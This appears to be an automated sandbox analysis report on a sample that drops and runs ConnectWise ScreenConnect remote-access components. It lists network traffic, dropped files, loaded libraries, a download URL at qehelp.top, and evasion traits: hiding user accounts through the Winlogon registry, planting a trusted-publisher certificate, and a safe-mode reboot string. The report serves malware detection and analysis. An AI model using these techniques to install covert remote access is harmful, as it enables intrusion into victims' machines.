Source: dfsvc.exe, 00000001.00000002.2779844547.000002AEF37ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.WindowsFileManager.exe.configo
Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, 00000000.00000002.1322014110.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.qehelp.top/Bin/ScreenConu

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49689
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49683
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49682
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49682 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown	Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown	Network traffic detected: HTTP traffic on port 49689 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49687 -> 443

Source: unknown

HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49682 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4			Jump to dropped file

System Summary

Detected potential unwanted application

Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe

PE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Code function: 0_2_00F2A5E5	0_2_00F2A5E5
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Code function: 0_2_00F21BD4	0_2_00F21BD4
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFB9AAFF995	1_2_00007FFB9AAFF995
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFB9AAFAEF5	1_2_00007FFB9AAFAEF5
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFB9AB12E99	1_2_00007FFB9AB12E99
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFB9AB033B1	1_2_00007FFB9AB033B1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFB9AB02758	1_2_00007FFB9AB02758
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFB9AAF6198	1_2_00007FFB9AAF6198
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFB9AAF1211	1_2_00007FFB9AAF1211
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFB9AB12870	1_2_00007FFB9AB12870

Source: ScreenConnect.Client.dll.1.dr

Static PE information: No import functions for PE file found

Source: ScreenConnect.Client.dll.1.dr

Static PE information: Data appended to the last section found

Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'

Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: classification engine

Classification label: mal45.evad.winEXE@3/22@1/1

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe

0_2_00F21000

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

File created: C:\Users\user\AppData\Local\Deployment

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Mutant created: NULL

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

File created: C:\Users\user\AppData\Local\Temp\Deployment

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe

Command line argument: dfshim

0_2_00F21000

Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Virustotal: Detection: 16%
Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	ReversingLabs: Detection: 26%

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Section loaded: dfshim.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dfshim.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: uiautomationcore.dll	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe

Static PE information: certificate valid

Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2775388417.000002AE8025E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE8060D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE80701000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: dfsvc.exe, 00000001.00000002.2779844547.000002AEF3630000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2775388417.000002AE806D5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE80262000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE80611000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.Windows.dll.1.dr
Source:	Binary string: lib.pdb source: dfsvc.exe, 00000001.00000002.2779844547.000002AEF3771000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.pdb source: dfsvc.exe, 00000001.00000002.2778707559.000002AEF0608000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdby source: ScreenConnect.WindowsClient.exe.1.dr
Source:	Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer322 source: dfsvc.exe, 00000001.00000002.2779624660.000002AEF1F70000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb1 source: ScreenConnect.WindowsBackstageShell.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80609000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE80548000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE8025A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE807DF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.Core.dll.1.dr

Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: ScreenConnect.Client.dll.1.dr

Static PE information: 0xFC5EF32A [Tue Mar 4 13:37:46 2104 UTC]

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe

0_2_00F21000

Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Static PE information: real checksum: 0x14df5 should be: 0x21a94
Source: ScreenConnect.Client.dll.1.dr	Static PE information: real checksum: 0x35012 should be: 0x3049e

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Code function: 0_2_00F21BC0 push ecx; ret	0_2_00F21BD3
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFB9A9DD2A5 pushad ; iretd	1_2_00007FFB9A9DD2A6
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFB9AAF6DA3 push esp; retf	1_2_00007FFB9AAF6F32
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFB9AAF6F42 push esp; retf	1_2_00007FFB9AAF6F43
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFB9AAF6EFF push esp; retf	1_2_00007FFB9AAF6F32
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFB9AB08D47 push 8B495CDBh; iretd	1_2_00007FFB9AB08D4C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFB9AAF7D00 push eax; retf	1_2_00007FFB9AAF7D1D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFB9AB19460 push cs; retn 5F4Ch	1_2_00007FFB9AB1947F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFB9AAF842E pushad ; ret	1_2_00007FFB9AAF845D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFB9AAF845E push eax; ret	1_2_00007FFB9AAF846D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFB9AAF00BD pushad ; iretd	1_2_00007FFB9AAF00C1

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.ClientService.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.WindowsClient.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.Windows.dll	Jump to dropped file

Source: ScreenConnect.ClientService.dll.1.dr

Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}

Hooking and other Techniques for Hiding and Protection

Contains functionality to hide user accounts

Source: ScreenConnect.ClientService.dll.1.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.Windows.dll.1.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
